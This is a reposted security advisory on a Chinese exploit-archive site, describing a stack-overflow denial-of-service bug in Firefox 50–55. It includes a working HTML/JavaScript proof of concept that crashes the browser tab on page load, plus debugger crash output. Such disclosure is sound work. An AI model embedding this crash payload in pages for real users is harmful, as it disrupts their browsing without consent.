首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox 55 Denial Of Service
来源:https://twitter.com/geeknik 作者:Carpenter 发布时间:2017-05-17  
Title:
==============
Unpatched Mozilla Firefox v50 - v55 Stack Overflow DoS Vulnerability

References:
==============
https://bugzilla.mozilla.org/show_bug.cgi?id=1322307

Timeline:
==============
Reported to Mozilla: 2016-12-06
Mozilla made public: 2016-12-15
Declined bounty: 2017-01-30
Advisory released: 2017-05-16

Technical Details:
==============
A stack overflow DoS vulnerability affecting Firefox versions 50 through 55 was discovered by Geeknik Labs. This flaw does NOT affect ESR 45 or the latest version of the Tor Browser Bundle. This flaw can be triggered by simply visiting a website with the PoC code embedded in it and requires no further user interaction nor does it require any special privileges. Successful exploitation results in the browser tab crashing.

Security Level:
==============
Medium

CVSS Score:
==============
3

Proof of Concept:
==============
<!--<html>
<head></head>
<body>
<script>
function done() {
}

var x = '';
for (i=0; i<500000; ++i)
x += '<a>';
var uri = 'data:image/svg+xml,' + x;
var i = new Image();
i.src = uri;
</script>
</body>
</html>-->

Visiting https://bugzilla.mozilla.org/attachment.cgi?id=8817075 may likely crash your browser tab.

Debug Information:
==============

(ff4.1108): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=5e3be520 ebx=00000000 ecx=256fab00 edx=00000001 esi=00000001 edi=256faab0
eip=5c718053 esp=00802ff4 ebp=00000000 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
xul!mozilla::dom::Element::UnbindFromTree+0x3:
5c718053 53 push ebx

FAULTING_IP:
xul!nsINode::doRemoveChildAt+6a [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\dom\base\nsinode.cpp @ 1910]
5c805677 8d4df8 lea ecx,[ebp-8]

BUCKET_ID: STACK_OVERFLOW_xul!nsINode::doRemoveChildAt+6a
PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_xul!nsINode::doRemoveChildAt+6a

Credits:
==============
Brian Carpenter, Geeknik Labs, https://twitter.com/geeknik



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MobaXtrem 10.2 Remote Code Exe
·Apple iOS < 10.3.2 - Notificat
·LabF nfsAxe 3.7 FTP Client - B
·Microsoft Windows - COM Aggreg
·MS17-010 EternalBlue SMB Remot
·Cerberus FTP 8.0.10.3 MLST Buf
·Dup Scout Enterprise 9.5.14 -
·Microsoft Windows 7 Kernel - '
·Serviio Media Server - checkSt
·Microsoft Windows 10 Kernel -
·WordPress PHPMailer 4.6 - Host
·Microsoft Windows 7 Kernel - U
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved